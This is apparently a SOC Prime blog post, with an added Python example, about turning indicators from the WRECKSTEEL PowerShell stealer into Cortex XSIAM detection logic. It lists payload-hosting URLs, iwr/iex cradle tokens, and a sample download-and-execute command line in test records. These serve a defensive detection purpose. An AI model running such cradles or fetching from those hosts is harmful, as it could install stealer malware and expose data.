
How It Works
Uncoder AI translates threat intelligence into Cortex XSIAM detection logic by ingesting structured IOCs and extracting relevant execution behaviors. This example focuses on the WRECKSTEEL campaign (CERT-UA#14283), a PowerShell-based stealer that abuses native tools and network requests to exfiltrate data.
On the left, Uncoder AI parses dozens of SHA256 hashes, filenames, scripts (script.ps1, scripttest.ps1), and phishing lure documents. On the right, it auto-generates Cortex XQL (XSIAM Query Language) detection logic that targets real-world execution patterns based on telemetry from winEventLog.
Auto-Generated Cortex XQL Logic
The output query is tailored to Cortex XSIAM’s data model and monitors suspicious command-line executions, including:
- Process Names: powershell.exe and wscript.exe
- Command-Line Indicators:
  - URLs linked to script downloads:
    http://107.189.20.74/screvan.ps1
    http://172.86.122.94/scrxxx.ps1
    http://172.86.104.17/scratest.ps1
    http://144.172.98.178/scretest.ps1
    http://172.86.88.15/scripttest.ps1
    http://45.61.157.179/script.ps1
  - Parameters: "*iwr*" (Invoke-WebRequest) and "*iex*" (Invoke-Expression)
- Script-Based Execution:
  - WScript executing AppFinalDesktop.vbs from temporary directories
This detection logic is designed to match malicious script execution chains that leverage PowerShell’s native capabilities and hardcoded payload delivery via HTTP.
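To make the matching described above concrete, here is an added example (not Uncoder AI's output and not XQL) that applies the same three checks in Python to constructed process-creation records: process name, iwr/iex cradle tokens plus the payload URLs listed on this page, and WScript launching AppFinalDesktop.vbs from a temp directory. The record keys (id, image, cmdline) and the temp-directory pattern are assumptions for the example.

```python
import re

# Indicators as listed on this page for the WRECKSTEEL detection logic.
PROCESS_NAMES = {"powershell.exe", "wscript.exe"}
DOWNLOAD_URLS = (
    "http://107.189.20.74/screvan.ps1",
    "http://172.86.122.94/scrxxx.ps1",
    "http://172.86.104.17/scratest.ps1",
    "http://144.172.98.178/scretest.ps1",
    "http://172.86.88.15/scripttest.ps1",
    "http://45.61.157.179/script.ps1",
)
CRADLE_TOKENS = ("iwr", "iex")  # Invoke-WebRequest / Invoke-Expression aliases ("*iwr*", "*iex*")
VBS_LURE = "appfinaldesktop.vbs"
TEMP_DIR_RE = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)  # assumed "temporary directory" test

def classify(event: dict) -> list:
    """Return the matched detection reasons for one process-creation record.
    The keys 'image' and 'cmdline' are assumptions, not XSIAM field names."""
    image = event.get("image", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("cmdline", "")
    low = cmd.lower()
    hits = []
    if image == "powershell.exe":
        if any(tok in low for tok in CRADLE_TOKENS):
            hits.append("powershell download cradle (iwr/iex)")
        hits.extend("known payload URL " + u for u in DOWNLOAD_URLS if u in low)
    elif image == "wscript.exe" and VBS_LURE in low and TEMP_DIR_RE.search(cmd):
        hits.append("wscript running AppFinalDesktop.vbs from a temp directory")
    return hits

def scan(events: list) -> list:
    """Return (record id, reasons) for every record that triggers at least one match."""
    return [(e["id"], classify(e)) for e in events if classify(e)]

# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -nop -w hidden -c "iex (iwr http://45.61.157.179/script.ps1)"'},
    {"id": 2, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\AppData\Local\Temp\AppFinalDesktop.vbs"'},
    {"id": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c Get-Service"},  # benign: no cradle token, no known URL
    {"id": 4, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Program Files\Vendor\AppFinalDesktop.vbs"'},  # lure name, not a temp dir
]

if __name__ == "__main__":
    for rec_id, reasons in scan(SAMPLE_EVENTS):
        print(rec_id, reasons)
```

Note that the "*iwr*" and "*iex*" wildcards from the page are substring matches, so the cradle check fires on any command line containing those letters; a production rule would pair it with the URL or script-file conditions as the generated XQL does.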
Why It’s Innovative
Creating behavioral rules in Cortex XSIAM requires manual curation of execution patterns, field mappings, and IOC context. Uncoder AI automates this by:
- Recognizing execution syntaxes like iwr and iex used in living-off-the-land attacks
- Correlating specific IOCs (URLs, file paths, scripts) with known malware campaigns
- Auto-generating XQL logic compatible with Palo Alto's data schema and winEventLog fields
This streamlines detection engineering by eliminating the need for custom rule authoring and enhancing IOC-to-behavior correlation.
Operational Value
Security teams using Cortex XSIAM benefit from:
- Accelerated Rule Creation: rapid conversion of threat intel into Cortex-compatible queries
- Precision IOC-to-Telemetry Mapping: targeting real attacker behaviors like PowerShell download cradles and script execution
- Improved Detection Coverage: multi-layered matching of process names, script execution flags, and malicious network destinations
By turning passive IOC feeds into active XSIAM detection logic, Uncoder AI empowers defenders to operationalize intelligence at speed and scale.
Uncoder AI translates IOCs into Palo Alto Cortex XSIAM queries — delivering actionable, high-fidelity queries for PowerShell-based threats.
The post AI-Driven IOC Conversion for Palo Alto Cortex XSIAM Queries appeared first on SOC Prime.